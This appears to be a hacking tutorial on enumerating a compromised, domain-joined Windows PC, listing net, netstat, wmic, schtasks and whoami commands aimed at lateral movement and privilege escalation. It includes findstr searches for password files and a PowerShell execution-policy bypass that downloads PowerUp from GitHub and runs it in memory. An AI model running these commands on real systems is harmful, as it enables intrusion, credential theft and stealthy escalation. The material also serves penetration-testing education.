In this tutorial i am going to cover basic enumeration of a Windows PC. Let me first set the scene, you have just got a shell on a Windows domain joined PC as an unprivileged domain user.
You’re first steps should be to enumerate as much information off this initial PC as possible, giving you an understanding of what other users and devices can be found on the rest of the network.
This additionally helps you move laterally across the network and raise your permissions to an administrator or domain admin. Furthermore, at this point you will own the whole network and have full access to the domain controllers.
Now i know there are a lot of scripts out there that will automate a lot of the commands i am about to show; still, in some circumstances you may find yourself in a situation that the user you are currently connected as may not even be able to download a script or the security is tight and you don’t really want to alert any admins.
In fact, most of these commands other then the domain specific commands will work on any windows device so you can easily try these commands out for yourself as you read this tutorial.
If you would like to know how to get initial access checkout out my tutorial on creating a payloads with MSFvenom to learn how to create custom shell code.
So lets get started……….
The net user command on its own displays all the local users on the box.
Adding /domain on the end of the net user command, will then display all the domain users.
You can also gain an insight into a particular user by using net user <username> which you can also add /domain to for any domain user.
The net user command allows you to crate a new user locally on a PC or on the domain.
Yet, you need to have at least local or domain admin rights otherwise you will get an access is denied.
Net localgroup shows all the local PC usergroups.
Just like the net user command add /domain to the end of the command to get all the domain user groups.
Find out who is actually a member of a specific group add the group name to the net localgroup command.
Remember to add the /domain on the end of the command for any windows domain groups.
The Net Group command works exactly the same as the net localgroup /domain command. The difference is that the Net group command allows you to also perform operations on groups with a global scope on the domain instead of just the local domain.
The net group command alone only works if used on a domain controller.
However, add a /domain to the command and it can be run on any windows domain joined PC.
Add a group name to this command to find out who is a member of the specified group.
The net use command on its own allows you to quickly see all the mapped network drives.
Similarly, you can also use the net use command to map a drive from the command prompt.
net use M: \\dc01\data\deathstarplans
Net start /stop allows you to manage services running on the PC; however, running the net start command on its own, shows all the services that are currently started.
netstat stands for network statistics This displays information about TCP network connections for listening ports Established connections and much more.
I usually use the -ano switch after the netstat command as this displays all connections and listening ports (a), addresses and port numbers (n) add the process ID associated with each connection (o).
There are lots of different options you can add to the netstat command which displays all sorts of different outputs.
You can list all the different options by adding a /? on the end of the command.
netsh firewall gives you options to control the windows firewall; however, adding show state to the command outputs the current firewall status to the terminal.
If you need more detailed information about the firewall add show config to display a much more in depth output.
The netsh firewall command has actually been depreciated by the netsh advfirewall command that being said, all the netsh firewall commands still work
Ipconfig displays all the networking information of the current PC your connected to.
If you add a /all to the ipconfig command it will give you a more detailed output which includes the DHCP and DNS server that the PC is connected to.
The route print command displays the routing table of the current windows PC your connected to.
The routing table is a set of rules, that are used to determine where data packets are directed to over the network. All networked devices, including routers and switches use routing tables.
Tasklist displays a list of currently running processes on a PC.
Adding the /svc switch to the command displays which services are hosted in each process.
The arp -a command displays the IP to physical address translation used by the address resolution protocol.
This basically is displaying all the other devices that the PC you are connected to has previously seen on the network, this includes there associated MAC address.
Driverquery quickly displays all the device drivers of the Pc your connected to.
This gives you the name of the device driver and version information that ultimately helps finding exploits and in-turn privilege escalation.
Hostname prints the name of the PC you are currently connected to.
Windows Management Instrumentation command allows you to recieve a huge range of information about local or remote pcs and probabley could do with a tutorial all of its own.
If you add a qfe to the wmic command you get a list of all the installed hotfixes installed on a windows PC.
This lets you quickly see the patch level of a pc and allows you to work out if there are any areas for exploitation.
The Set command on its own shows all the environment variables of the PC your connected to.
This allows you to quickly see environment information. For instance, what is the name of the domain controller or where the user profile stored.
The systeminfo command on its own can give you lots of information about the current PC you are connected to.
The only problem is that it can take a long time gathering all the hotfix information.
However, you can pipe (|) the output to a find string (findstr) command outputting just the information your after.
In the command below i am just displaying the OS Name and OS Version which includes the windows build number.
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Schtasks allows you to manage scheduled tasks running on a local or remote machine
I like to use /query to query all the scheduled tasks currently running on the windows pc and output the format /fo into a list to make it easier to read.
Schtasks /query /fo LIST /v
The /v at the end of the command is for verbose output and allows you to see what user that scheduled task is running as this is important in the future for things like privilege escalation .
Whoami on its own, quickly tells you the domain and the username of the user currently connected as.
More over, by adding /all to the command you receive a more detailed output this includes SID, Group and privilege Information
This is a command i like to run straight off the bat. Echoing out the %logonserver% displays the domain controller’s name
This command echos out the username of the user you are connected as.
Simple File Search
The commands listed below will allow you to quickly scan a PC for documents either named or are containing a specific words for example password.
dir /s *password*
findstr /s /n /i /p foo*
findstr /si pass *.txt | *.xml| *.ini
We cant talk about situational awareness and privilege escalation without taking a few mins to take a look at Powerup.
PowerUp is one of the powershell modules from PowerSploit, which is a powershell post exploitation framework.
PowerUp quickly audits a PC for common windows Privilege escalation vectors. This can be run by any user even if they are unprivileged.
Download PowerUp from HarmJoys GitHub https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1
Download the raw script from the HarmJoys GitHub repo (above).
In the command prompt type:
C:\powershell.exe -nop -exec bypass
Import the PowerUp module:
Run the Inovke-AllChecks function, which runs through all relevant checks for the PC and outputs a status report:
You can even run PowerUp from github without ever touching disk by typing the command below.
powershell -nop -exec bypass -c "IEX (New-Object Net.webClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
These are some of the commands that I run when i get an initial foothold on a windows PC. Nevertheless, lets be clear here no one has time to remember all these commands.
Luckly, Leostat has created a quick python script that has tons of these handy commands easliy searchable in a tool called rtfm.py
If you think that i have missed any commands here or would like to let me know what commands you use, please let me know in the comments below.